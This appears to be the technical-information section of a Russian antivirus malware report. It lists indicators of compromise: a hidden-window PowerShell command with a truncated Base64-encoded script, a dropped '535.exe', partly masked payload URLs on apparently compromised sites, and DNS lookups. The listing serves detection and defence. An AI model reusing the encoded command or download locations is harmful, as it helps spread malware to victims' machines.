Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABaAHUAYQBnAHkAYwB0AGEAYgBxAHQAagB4AD0AJwBDAGsAbQBkAHUAcABkAGkAbQBxACcAOwAkAEYAcABhAHkAYQB6AHoAcwBmAH...
- %HOMEPATH%\535.exe
- %HOMEPATH%\535.exe
- http://sh####iaranik.com/wp-includes/olb-lom-698/
- http://sh####iaranik.com/cgi-sys/suspendedpage.cgi
- http://www.ma#####fernandez.com/7h6j5/pcfTWMCrB/
- http://fu###logic.in/wp-admin/iqdiu9edo-p6kb5xrf-408110/
- http://re####rantle63.fr/wp-includes/jCwWUaVIG/
- DNS ASK sh####iaranik.com
- DNS ASK si####ofort.online
- DNS ASK ma#####fernandez.com
- DNS ASK fu###logic.in
- DNS ASK re####rantle63.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABaAHUAYQBnAHkAYwB0AGEAYgBxAHQAagB4AD0AJwBDAGsAbQBkAHUAcABkAGkAbQBxACcAOwAkAEYAcABhAHkAYQB6AHoAcwBmAH...' (со скрытым окном)